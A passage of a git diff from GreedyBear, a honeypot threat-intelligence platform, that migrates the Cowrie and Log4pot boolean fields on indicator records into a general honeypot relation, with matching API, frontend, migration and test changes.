+            annotations[hp.name] = Count("name", distinct=True, filter=Q(general_honeypot__name__iexact=hp.name))
         return self.__aggregation_response_static_ioc(annotations)
 
     def __aggregation_response_static_statistics(self, annotations: dict) -> Response:
diff --git a/api/views/utils.py b/api/views/utils.py
index 87face9d..cded1e9b 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -8,12 +8,11 @@
 
 from django.conf import settings
 from django.contrib.postgres.aggregates import ArrayAgg
-from django.db.models import F, Q
+from django.db.models import F
 from django.http import HttpResponse, HttpResponseBadRequest, StreamingHttpResponse
 from rest_framework import status
 from rest_framework.response import Response
 
-from api.enums import Honeypots
 from api.serializers import FeedsRequestSerializer
 from greedybear.models import IOC, GeneralHoneypot, Statistics
 
@@ -117,8 +116,9 @@ def get_valid_feed_types() -> frozenset[str]:
     Returns:
         frozenset[str]: An immutable set of valid feed type strings
     """
-    general_honeypots = GeneralHoneypot.objects.all().filter(active=True)
-    return frozenset([Honeypots.LOG4J.value, Honeypots.COWRIE.value, "all"] + [hp.name.lower() for hp in general_honeypots])
+    general_honeypots = GeneralHoneypot.objects.filter(active=True)
+    feed_types = ["all"] + [hp.name.lower() for hp in general_honeypots]
+    return frozenset(feed_types)
 
 
 def get_queryset(request, feed_params, valid_feed_types):
@@ -147,11 +147,7 @@ def get_queryset(request, feed_params, valid_feed_types):
 
     query_dict = {}
     if feed_params.feed_type != "all":
-        if feed_params.feed_type in (Honeypots.LOG4J.value, Honeypots.COWRIE.value):
-            query_dict[feed_params.feed_type] = True
-        else:
-            # accept feed_type if it is in the general honeypots list
-            query_dict["general_honeypot__name__iexact"] = feed_params.feed_type
+        query_dict["general_honeypot__name__iexact"] = feed_params.feed_type
 
     if feed_params.attack_type != "all":
         query_dict[feed_params.attack_type] = True
@@ -167,10 +163,11 @@ def get_queryset(request, feed_params, valid_feed_types):
 
     iocs = (
         IOC.objects.filter(**query_dict)
-        .filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
+        .filter(general_honeypot__active=True)
         .exclude(ip_reputation__in=feed_params.exclude_reputation)
         .annotate(value=F("name"))
         .annotate(honeypots=ArrayAgg("general_honeypot__name"))
+        .distinct()
         .order_by(feed_params.ordering)[: int(feed_params.feed_size)]
     )
 
@@ -236,8 +233,6 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
                 "last_seen",
                 "attack_count",
                 "interaction_count",
-                "log4j",
-                "cowrie",
                 "scanner",
                 "payload_request",
                 "ip_reputation",
@@ -250,15 +245,11 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
                 "recurrence_probability",
                 "expected_interactions",
             }
+
+            # Collect values; `honeypots` will contain the list of associated honeypot names
             iocs = (ioc_as_dict(ioc, required_fields) for ioc in iocs) if isinstance(iocs, list) else iocs.values(*required_fields)
             for ioc in iocs:
-                ioc_feed_type = []
-                if ioc[Honeypots.LOG4J.value]:
-                    ioc_feed_type.append(Honeypots.LOG4J.value)
-                if ioc[Honeypots.COWRIE.value]:
-                    ioc_feed_type.append(Honeypots.COWRIE.value)
-                if len(ioc["honeypots"]):
-                    ioc_feed_type.extend([hp.lower() for hp in ioc["honeypots"] if hp is not None])
+                ioc_feed_type = [hp.lower() for hp in ioc.get("honeypots", []) if hp]
 
                 data_ = ioc | {
                     "first_seen": ioc["first_seen"].strftime("%Y-%m-%d"),
diff --git a/frontend/src/components/feeds/Feeds.jsx b/frontend/src/components/feeds/Feeds.jsx
index 6b03bfe7..f81c276c 100644
--- a/frontend/src/components/feeds/Feeds.jsx
+++ b/frontend/src/components/feeds/Feeds.jsx
@@ -14,11 +14,7 @@ import { feedsTableColumns } from "./tableColumns";
 import { FEEDS_LICENSE } from "../../constants";
 
 // costants
-const feedTypeChoices = [
-  { label: "All", value: "all" },
-  { label: "Log4j", value: "log4j" },
-  { label: "Cowrie", value: "cowrie" },
-];
+const feedTypeChoices = [{ label: "All", value: "all" }];
 
 const attackTypeChoices = [
   { label: "All", value: "all" },
diff --git a/frontend/tests/components/feeds/Feeds.test.jsx b/frontend/tests/components/feeds/Feeds.test.jsx
index 38a4ea80..53b5f162 100644
--- a/frontend/tests/components/feeds/Feeds.test.jsx
+++ b/frontend/tests/components/feeds/Feeds.test.jsx
@@ -38,11 +38,16 @@ jest.mock("@certego/certego-ui", () => {
     ...originalModule,
 
     useAxiosComponentLoader: jest.fn(() => [
-      ["Honeytrap", "Glutton", "CitrixHoneypot"],
+      ["Honeytrap", "Glutton", "CitrixHoneypot", "Log4j", "Cowrie"],
       loader,
     ]),
 
-    useDataTable: jest.fn(() => [feeds, <MockTableComponent />, jest.fn()]),
+    useDataTable: jest.fn(() => [
+      feeds,
+      <MockTableComponent />,
+      jest.fn(),
+      jest.fn(),
+    ]),
   };
 });
 
diff --git a/greedybear/admin.py b/greedybear/admin.py
index 8d5bcee6..830e34c6 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -113,8 +113,6 @@ class IOCModelAdmin(admin.ModelAdmin):
         "related_urls",
         "scanner",
         "payload_request",
-        "log4j",
-        "cowrie",
         "general_honeypots",
         "ip_reputation",
         "firehol_categories",
@@ -124,8 +122,6 @@ class IOCModelAdmin(admin.ModelAdmin):
     ]
     list_filter = [
         "type",
-        "log4j",
-        "cowrie",
         "scanner",
         "payload_request",
         "ip_reputation",
diff --git a/greedybear/cronjobs/extraction/strategies/cowrie.py b/greedybear/cronjobs/extraction/strategies/cowrie.py
index 65afa93a..71738559 100644
--- a/greedybear/cronjobs/extraction/strategies/cowrie.py
+++ b/greedybear/cronjobs/extraction/strategies/cowrie.py
@@ -105,9 +105,8 @@ def extract_from_hits(self, hits: list[dict]) -> None:
     def _get_scanners(self, hits: list[dict]) -> None:
         """Extract scanner IPs and sessions."""
         for ioc in iocs_from_hits(hits):
-            ioc.cowrie = True
             self.log.info(f"found IP {ioc.name} by honeypot cowrie")
-            ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+            ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Cowrie")
             if ioc_record:
                 self.ioc_records.append(ioc_record)
                 threatfox_submission(ioc_record, ioc.related_urls, self.log)
@@ -146,10 +145,9 @@ def _extract_possible_payload_in_messages(self, hits: list[dict]) -> None:
             ioc = IOC(
                 name=payload_hostname,
                 type=get_ioc_type(payload_hostname),
-                cowrie=True,
                 related_urls=[payload_url],
             )
-            self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+            self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Cowrie")
             self._add_fks(scanner_ip, payload_hostname)
             self.payloads_in_message += 1
 
@@ -181,10 +179,9 @@ def _get_url_downloads(self, hits: list[dict]) -> None:
                 ioc = IOC(
                     name=hostname,
                     type=get_ioc_type(hostname),
-                    cowrie=True,
                     related_urls=[download_url],
                 )
-                ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+                ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Cowrie")
                 if ioc_record:
                     self.added_url_downloads += 1
                     threatfox_submission(ioc_record, ioc.related_urls, self.log)
diff --git a/greedybear/cronjobs/extraction/strategies/log4pot.py b/greedybear/cronjobs/extraction/strategies/log4pot.py
index c2e92bb1..879b14cb 100644
--- a/greedybear/cronjobs/extraction/strategies/log4pot.py
+++ b/greedybear/cronjobs/extraction/strategies/log4pot.py
@@ -80,8 +80,8 @@ def extract_from_hits(self, hits: list[dict]) -> None:
 
             # add scanner
             if scanner_ip:
-                ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip), log4j=True)
-                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+                ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip))
+                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
                 added_scanners += 1
 
             # add first URL
@@ -90,10 +90,9 @@ def extract_from_hits(self, hits: list[dict]) -> None:
                 ioc = IOC(
                     name=scanner_ip,
                     type=get_ioc_type(scanner_ip),
-                    log4j=True,
                     related_urls=related_urls,
                 )
-                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
                 added_payloads += 1
 
             # add hidden URL
@@ -102,10 +101,9 @@ def extract_from_hits(self, hits: list[dict]) -> None:
                 ioc = IOC(
                     name=hostname,
                     type=get_ioc_type(hostname),
-                    log4j=True,
                     related_urls=related_urls,
                 )
-                self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+                self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Log4pot")
                 added_hidden_payloads += 1
 
             # once all have added, we can add the foreign keys
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index cb421cc9..abd59a44 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -215,13 +215,7 @@ def threatfox_submission(ioc_record: IOC, related_urls: list, log: Logger) -> No
     headers = {"Auth-Key": settings.THREATFOX_API_KEY}
     log.info(f"submitting IOC {urls_to_submit} to Threatfox")
 
-    seen_honeypots = []
-    if ioc_record.cowrie:
-        seen_honeypots.append("cowrie")
-    if ioc_record.log4j:
-        seen_honeypots.append("log4pot")
-    for honeypot in ioc_record.general_honeypot.all():
-        seen_honeypots.append(honeypot.name)
+    seen_honeypots = [hp.name for hp in ioc_record.general_honeypot.all()]
     seen_honeypots_str = ", ".join(seen_honeypots)
 
     json_data = {
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 29032cea..a63bd354 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -2,7 +2,7 @@
 
 from django.contrib.postgres.aggregates import ArrayAgg
 from django.db import IntegrityError
-from django.db.models import F, Q
+from django.db.models import F
 
 from greedybear.models import IOC, GeneralHoneypot
 
@@ -15,13 +15,10 @@ class IocRepository:
     and updated when new honeypots are created.
     """
 
-    SPECIAL_HONEYPOTS = frozenset({"Cowrie", "Log4pot"})
-
     def __init__(self):
         """Initialize the repository and populate the honeypot cache from the database."""
         self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
         self._honeypot_cache = {self._normalize_name(hp.name): hp.active for hp in GeneralHoneypot.objects.all()}
-        self._honeypot_cache.update({self._normalize_name(name): True for name in self.SPECIAL_HONEYPOTS})
 
     def _normalize_name(self, name: str) -> str:
         """Normalize honeypot names for consistent cache and DB usage."""
@@ -123,7 +120,6 @@ def is_empty(self) -> bool:
     def is_enabled(self, honeypot_name: str) -> bool:
         """
         Check if a honeypot is enabled.
-        Special honeypots (Cowrie, Log4pot) are always enabled.
         General honeypots are enabled based on their active flag.
 
         Args:
@@ -178,7 +174,7 @@ def get_scanners_for_scoring(self, score_fields: list[str]) -> list[IOC]:
         Returns:
             QuerySet of IOC objects with only name and score fields loaded.
         """
-        return IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True)).filter(scanner=True).distinct().only("name", *score_fields)
+        return IOC.objects.filter(general_honeypot__active=True).filter(scanner=True).distinct().only("name", *score_fields)
 
     def get_scanners_by_pks(self, primary_keys: set[int]):
         """
@@ -214,7 +210,7 @@ def get_recent_scanners(self, cutoff_date, days_lookback: int = 30):
             QuerySet of IOC objects with prefetched relationships and annotations.
         """
         return (
-            IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
+            IOC.objects.filter(general_honeypot__active=True)
             .filter(last_seen__gte=cutoff_date, scanner=True)
             .prefetch_related("general_honeypot")
             .annotate(value=F("name"))
diff --git a/greedybear/migrations/0030_migrate_cowrie_log4j.py b/greedybear/migrations/0030_migrate_cowrie_log4j.py
new file mode 100644
index 00000000..48eb58e1
--- /dev/null
+++ b/greedybear/migrations/0030_migrate_cowrie_log4j.py
@@ -0,0 +1,41 @@
+"""
+Generated data migration to move `cowrie` and `log4j` boolean flags
+into the `GeneralHoneypot` many-to-many relationship.
+
+This migration ensures that `Cowrie` and `Log4pot` entries exist in
+`GeneralHoneypot` and for each IOC that had the boolean flags set it
+adds the corresponding honeypot to the `general_honeypot` M2M.
+"""
+from django.db import migrations
+
+
+def migrate_cowrie_log4j_to_general(apps, schema_editor):
+    GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+    IOC = apps.get_model("greedybear", "IOC")
+
+    # Ensure honeypot entries exist
+    cowrie_hp, _ = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})
+    log4pot_hp, _ = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})
+
+    # Migrate existing IOC rows
+    for ioc in IOC.objects.all():
+        try:
+            # Some historical DBs might not yet have these fields; use getattr with default
+            if getattr(ioc, "cowrie", False):
+                ioc.general_honeypot.add(cowrie_hp)
+            if getattr(ioc, "log4j", False):
+                ioc.general_honeypot.add(log4pot_hp)
+        except Exception:
+            # Be resilient to odd DB states; continue migrating other rows
+            continue
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ("greedybear", "0029_remove_hardcoded_honeypots"),
+    ]
+
+    operations = [
+        migrations.RunPython(migrate_cowrie_log4j_to_general, reverse_code=migrations.RunPython.noop),
+    ]
diff --git a/greedybear/migrations/0031_remove_cowrie_log4j_fields.py b/greedybear/migrations/0031_remove_cowrie_log4j_fields.py
new file mode 100644
index 00000000..e824e715
--- /dev/null
+++ b/greedybear/migrations/0031_remove_cowrie_log4j_fields.py
@@ -0,0 +1,18 @@
+"""
+Schema migration to remove the legacy `cowrie` and `log4j` boolean
+fields from the `IOC` model now that they are represented by the
+`general_honeypot` many-to-many relation.
+"""
+from django.db import migrations
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ("greedybear", "0030_migrate_cowrie_log4j"),
+    ]
+
+    operations = [
+        migrations.RemoveField(model_name="ioc", name="cowrie"),
+        migrations.RemoveField(model_name="ioc", name="log4j"),
+    ]
diff --git a/greedybear/models.py b/greedybear/models.py
index 2f0d6a76..dc71c6be 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -60,8 +60,6 @@ class IOC(models.Model):
     number_of_days_seen = models.IntegerField(default=1)
     attack_count = models.IntegerField(default=1)
     interaction_count = models.IntegerField(default=1)
-    log4j = models.BooleanField(blank=False, default=False)
-    cowrie = models.BooleanField(blank=False, default=False)
     # FEEDS - list of honeypots from general list, from which the IOC was detected
     general_honeypot = models.ManyToManyField(GeneralHoneypot, blank=True)
     scanner = models.BooleanField(blank=False, default=False)
diff --git a/tests/__init__.py b/tests/__init__.py
index a22d4d87..690676f3 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -24,6 +24,11 @@ def setUpTestData(cls):
         cls.ddospot = GeneralHoneypot.objects.get_or_create(name="Ddospot", defaults={"active": False})[0]
 
         cls.current_time = datetime.now()
+
+        # Create honeypots for Cowrie and Log4pot (replacing boolean fields)
+        cls.cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        cls.log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+
         cls.ioc = IOC.objects.create(
             name="140.246.171.141",
             type=IocType.IP.value,
@@ -33,8 +38,6 @@ def setUpTestData(cls):
             number_of_days_seen=1,
             attack_count=1,
             interaction_count=1,
-            log4j=True,
-            cowrie=True,
             scanner=True,
             payload_request=True,
             related_urls=[],
@@ -55,8 +58,6 @@ def setUpTestData(cls):
             number_of_days_seen=1,
             attack_count=1,
             interaction_count=1,
-            log4j=True,
-            cowrie=True,
             scanner=True,
             payload_request=True,
             related_urls=[],
@@ -77,8 +78,6 @@ def setUpTestData(cls):
             number_of_days_seen=1,
             attack_count=1,
             interaction_count=1,
-            log4j=False,
-            cowrie=True,
             scanner=True,
             payload_request=True,
             related_urls=[],
@@ -99,8 +98,6 @@ def setUpTestData(cls):
             number_of_days_seen=1,
             attack_count=1,
             interaction_count=1,
-            log4j=True,
-            cowrie=False,
             scanner=False,
             payload_request=True,
             related_urls=[],
@@ -114,11 +111,18 @@ def setUpTestData(cls):
 
         cls.ioc.general_honeypot.add(cls.heralding)  # FEEDS
         cls.ioc.general_honeypot.add(cls.ciscoasa)  # FEEDS
+        cls.ioc.general_honeypot.add(cls.cowrie_hp)  # Cowrie honeypot
+        cls.ioc.general_honeypot.add(cls.log4pot_hp)  # Log4pot honeypot
         cls.ioc.save()
         cls.ioc_2.general_honeypot.add(cls.heralding)  # FEEDS
         cls.ioc_2.general_honeypot.add(cls.ciscoasa)  # FEEDS
+        cls.ioc_2.general_honeypot.add(cls.cowrie_hp)  # Cowrie honeypot
+        cls.ioc_2.general_honeypot.add(cls.log4pot_hp)  # Log4pot honeypot
         cls.ioc_2.save()
+        cls.ioc_3.general_honeypot.add(cls.cowrie_hp)  # Cowrie honeypot
+        cls.ioc_3.save()
         cls.ioc_domain.general_honeypot.add(cls.heralding)  # FEEDS
+        cls.ioc_domain.general_honeypot.add(cls.log4pot_hp)  # Log4pot honeypot
         cls.ioc_domain.save()
 
         cls.cmd_seq = ["cd foo", "ls -la"]
diff --git a/tests/api/test_feed_types.py b/tests/api/test_feed_types.py
new file mode 100644
index 00000000..35118fc9
--- /dev/null
+++ b/tests/api/test_feed_types.py
@@ -0,0 +1,156 @@
+"""
+Tests for API feed type handling after migration from boolean fields.
+"""
+
+from django.test import override_settings
+from rest_framework.test import APIClient
+
+from greedybear.models import IOC, GeneralHoneypot, IocType
+from tests import CustomTestCase
+
+
+class FeedTypeAPITestCase(CustomTestCase):
+    """Test API feed handling with GeneralHoneypot M2M instead of boolean fields."""
+
+    def setUp(self):
+        self.client = APIClient()
+        self.client.force_authenticate(user=self.superuser)
+
+        # Ensure Cowrie and Log4pot honeypots exist
+        self.cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        self.log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+
+    def test_feed_type_derived_from_m2m(self):
+        """Verify feed_type is derived from general_honeypot M2M."""
+        response = self.client.get("/api/feeds/all/all/recent.json")
+        self.assertEqual(response.status_code, 200)
+
+        iocs = response.json()["iocs"]
+        target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+        self.assertIsNotNone(target_ioc)
+
+        # Feed types should be derived from M2M
+        feed_types = set(target_ioc["feed_type"])
+        self.assertIn("log4pot", feed_types)
+        self.assertIn("cowrie", feed_types)
+        self.assertIn("heralding", feed_types)
+        self.assertIn("ciscoasa", feed_types)
+
+    def test_feed_filter_by_cowrie(self):
+        """Verify filtering by cowrie feed type works via M2M."""
+        # Include mass scanners and tor exit nodes since test IOCs have those reputations
+        response = self.client.get("/api/feeds/cowrie/all/recent.json?include_mass_scanners=true&include_tor_exit_nodes=true")
+        self.assertEqual(response.status_code, 200)
+
+        iocs = response.json()["iocs"]
+        ioc_names = [ioc["value"] for ioc in iocs]
+
+        # Should include IOCs associated with Cowrie honeypot
+        self.assertIn(self.ioc.name, ioc_names)
+        self.assertIn(self.ioc_2.name, ioc_names)
+        self.assertIn(self.ioc_3.name, ioc_names)
+
+    def test_feed_filter_by_log4pot(self):
+        """Verify filtering by log4pot feed type works via M2M."""
+        # Include mass scanners since ioc_2 has that reputation
+        response = self.client.get("/api/feeds/log4pot/all/recent.json?include_mass_scanners=true")
+        self.assertEqual(response.status_code, 200)
+
+        iocs = response.json()["iocs"]
+        ioc_names = [ioc["value"] for ioc in iocs]
+
+        # Should include IOCs associated with Log4pot honeypot
+        self.assertIn(self.ioc.name, ioc_names)
+        self.assertIn(self.ioc_2.name, ioc_names)
+
+    def test_feed_valid_types_includes_all_active_honeypots(self):
+        """Verify valid feed types include all active honeypots."""
+        from api.views.utils import get_valid_feed_types
+
+        valid_types = get_valid_feed_types()
+
+        # Should include all active honeypots (case-insensitive)
+        self.assertIn("all", valid_types)
+        self.assertIn("cowrie", valid_types)
+        self.assertIn("log4pot", valid_types)
+        self.assertIn("heralding", valid_types)
+        self.assertIn("ciscoasa", valid_types)
+
+    def test_inactive_honeypot_not_in_valid_types(self):
+        """Verify inactive honeypots are not included in valid feed types."""
+        from api.views.utils import get_valid_feed_types
+
+        valid_types_before = get_valid_feed_types()
+
+        # Deactivate a honeypot
+        self.ddospot.active = False
+        self.ddospot.save()
+
+        valid_types_after = get_valid_feed_types()
+
+        # Ddospot was already inactive, should not be in either
+        self.assertNotIn("ddospot", valid_types_before)
+        self.assertNotIn("ddospot", valid_types_after)
+
+    def test_feed_type_no_normalization_log4pot(self):
+        """Verify Log4pot is NOT normalized to log4j in feed output."""
+        # Create an IOC with only Log4pot
+        ioc = IOC.objects.create(
+            name="100.200.100.200",
+            type=IocType.IP.value,
+            scanner=True,
+        )
+        ioc.general_honeypot.add(self.log4pot_hp)
+
+        response = self.client.get("/api/feeds/all/all/recent.json")
+        self.assertEqual(response.status_code, 200)
+
+        iocs = response.json()["iocs"]
+        target_ioc = next((i for i in iocs if i["value"] == ioc.name), None)
+        self.assertIsNotNone(target_ioc)
+
+        # Should contain "log4pot" and NOT "log4j"
+        self.assertIn("log4pot", target_ioc["feed_type"])
+        self.assertNotIn("log4j", target_ioc["feed_type"])
+
+    def test_feed_output_without_boolean_fields(self):
+        """Verify feed output doesn't contain legacy boolean fields."""
+        response = self.client.get("/api/feeds/all/all/recent.json")
+        self.assertEqual(response.status_code, 200)
+
+        iocs = response.json()["iocs"]
+        if iocs:
+            first_ioc = iocs[0]
+            # These boolean fields should not exist in the output
+            self.assertNotIn("log4j", first_ioc)
+            self.assertNotIn("cowrie", first_ioc)
+
+    def test_enrichment_output_includes_honeypot_list(self):
+        """Verify enrichment endpoint includes honeypot list."""
+        response = self.client.get(f"/api/enrichment?query={self.ioc.name}")
+        self.assertEqual(response.status_code, 200)
+        self.assertTrue(response.json()["found"])
+
+        # Should have general_honeypot list (serialized as list of strings)
+        honeypots = response.json()["ioc"]["general_honeypot"]
+        self.assertIsInstance(honeypots, list)
+        self.assertGreater(len(honeypots), 0)
+
+        # Check that honeypot names are in the list
+        self.assertIn("Cowrie", honeypots)
+        self.assertIn("Log4pot", honeypots)
+
+    @override_settings(FEEDS_LICENSE="https://example.com/license")
+    def test_feed_with_multiple_honeypots(self):
+        """Verify IOC with multiple honeypots shows all in feed_type."""
+        response = self.client.get("/api/feeds/all/all/recent.json")
+        self.assertEqual(response.status_code, 200)
+
+        iocs = response.json()["iocs"]
+        target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+        self.assertIsNotNone(target_ioc)
+
+        # Should have multiple feed types from all associated honeypots
+        feed_types = target_ioc["feed_type"]
+        self.assertGreater(len(feed_types), 1)
+        self.assertIsInstance(feed_types, list)
diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
index 5b6bf160..b1590ea1 100644
--- a/tests/greedybear/cronjobs/test_monitor_honeypots.py
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -17,32 +17,32 @@ def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):
         # Run the cronjob
         cronjob.execute()
 
-        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 4)
 
         info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
         warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
 
-        self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 2)
+        self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 4)
         self.assertEqual(len(warning_calls), 0)
 
     @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
     def test_run_some_active_honeypots_are_hit(self, mock_elastic_repo_class):
         # Setup mock responses
         mock_elastic_repo = mock_elastic_repo_class.return_value
-        mock_elastic_repo.has_honeypot_been_hit.side_effect = [True, False]
+        mock_elastic_repo.has_honeypot_been_hit.side_effect = [True, False, True, False]
         cronjob = MonitorHoneypots(minutes_back=60)
         cronjob.log = MagicMock()
 
         # Run the cronjob
         cronjob.execute()
 
-        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 4)
 
         info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
         warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
 
-        self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 1)
-        self.assertEqual(len(warning_calls), 1)
+        self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 2)
+        self.assertEqual(len(warning_calls), 2)
 
     @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
     def test_run_no_active_honeypots_are_hit(self, mock_elastic_repo_class):
@@ -55,10 +55,10 @@ def test_run_no_active_honeypots_are_hit(self, mock_elastic_repo_class):
         # Run the cronjob
         cronjob.execute()
 
-        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+        self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 4)
 
         info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
         warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
 
         self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 0)
-        self.assertEqual(len(warning_calls), 2)
+        self.assertEqual(len(warning_calls), 4)
diff --git a/tests/test_cowrie_extraction.py b/tests/test_cowrie_extraction.py
index 1a9b96fe..b559d726 100644
--- a/tests/test_cowrie_extraction.py
+++ b/tests/test_cowrie_extraction.py
@@ -117,8 +117,9 @@ def test_extract_payload_in_messages_with_url(self):
         ioc_arg = call_args[0][0]
 
         self.assertEqual(ioc_arg.name, "evil.com")
-        self.assertTrue(ioc_arg.cowrie)
         self.assertIn("http://evil.com/malware.exe", ioc_arg.related_urls)
+        # Verify honeypot is set via general_honeypot_name argument
+        self.assertEqual(call_args.kwargs.get("general_honeypot_name"), "Cowrie")
 
     def test_extract_payload_in_messages_no_url(self):
         """Test extraction when message has no URL."""
@@ -331,7 +332,6 @@ def test_deduplicate_command_sequence_existing(self):
     def test_extract_from_hits_integration(self, mock_iocs_from_hits):
         """Test the main extract_from_hits coordination."""
         mock_ioc = Mock(name="1.2.3.4")
-        mock_ioc.cowrie = False
         mock_iocs_from_hits.return_value = [mock_ioc]
 
         mock_ioc_record = Mock()
@@ -343,6 +343,7 @@ def test_extract_from_hits_integration(self, mock_iocs_from_hits):
             with patch.object(self.strategy, "_extract_possible_payload_in_messages"):
                 self.strategy.extract_from_hits(hits)
 
-        # Verify scanner was processed
-        self.assertTrue(mock_ioc.cowrie)
+        # Verify scanner was processed with Cowrie as honeypot
         self.strategy.ioc_processor.add_ioc.assert_called()
+        call_args = self.strategy.ioc_processor.add_ioc.call_args
+        self.assertEqual(call_args.kwargs.get("general_honeypot_name"), "Cowrie")
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 7c6f56ea..558e76d3 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -547,11 +547,9 @@ class ThreatfoxSubmissionTestCase(ExtractionTestCase):
     def setUp(self):
         self.mock_log = Mock()
 
-    def _create_mock_payload_request(self, cowrie=False, log4j=False):
+    def _create_mock_payload_request(self):
         mock = self._create_mock_ioc()
         mock.payload_request = True
-        mock.cowrie = cowrie
-        mock.log4j = log4j
         mock.general_honeypot.all.return_value = []
         return mock
 
@@ -579,7 +577,10 @@ def test_skips_urls_without_path(self, mock_settings):
     def test_submits_urls_with_path(self, mock_settings, mock_post):
         mock_settings.THREATFOX_API_KEY = "test-key"
         mock_post.return_value = Mock(text='{"status": "ok"}')
-        ioc_record = self._create_mock_payload_request(cowrie=True)
+        mock_honeypot_cowrie = Mock()
+        mock_honeypot_cowrie.name = "Cowrie"
+        ioc_record = self._create_mock_payload_request()
+        ioc_record.general_honeypot.all.return_value = [mock_honeypot_cowrie]
         threatfox_submission(ioc_record, ["http://malicious.com/payload.sh"], self.mock_log)
         mock_post.assert_called_once()
         call_kwargs = mock_post.call_args[1]
@@ -591,15 +592,19 @@ def test_submits_urls_with_path(self, mock_settings, mock_post):
     def test_includes_honeypot_names_in_comment(self, mock_settings, mock_post):
         mock_settings.THREATFOX_API_KEY = "test-key"
         mock_post.return_value = Mock(text='{"status": "ok"}')
-        ioc_record = self._create_mock_payload_request(cowrie=True, log4j=True)
-        mock_honeypot = Mock()
-        mock_honeypot.name = "Dionaea"
-        ioc_record.general_honeypot.all.return_value = [mock_honeypot]
+        ioc_record = self._create_mock_payload_request()
+        mock_honeypot_cowrie = Mock()
+        mock_honeypot_cowrie.name = "Cowrie"
+        mock_honeypot_log4pot = Mock()
+        mock_honeypot_log4pot.name = "Log4pot"
+        mock_honeypot_dionaea = Mock()
+        mock_honeypot_dionaea.name = "Dionaea"
+        ioc_record.general_honeypot.all.return_value = [mock_honeypot_cowrie, mock_honeypot_log4pot, mock_honeypot_dionaea]
         threatfox_submission(ioc_record, ["http://malicious.com/payload.sh"], self.mock_log)
         call_kwargs = mock_post.call_args[1]
         comment = call_kwargs["json"]["comment"]
-        self.assertIn("cowrie", comment)
-        self.assertIn("log4pot", comment)
+        self.assertIn("Cowrie", comment)
+        self.assertIn("Log4pot", comment)
         self.assertIn("Dionaea", comment)
 
     @patch("greedybear.cronjobs.extraction.utils.requests.post")
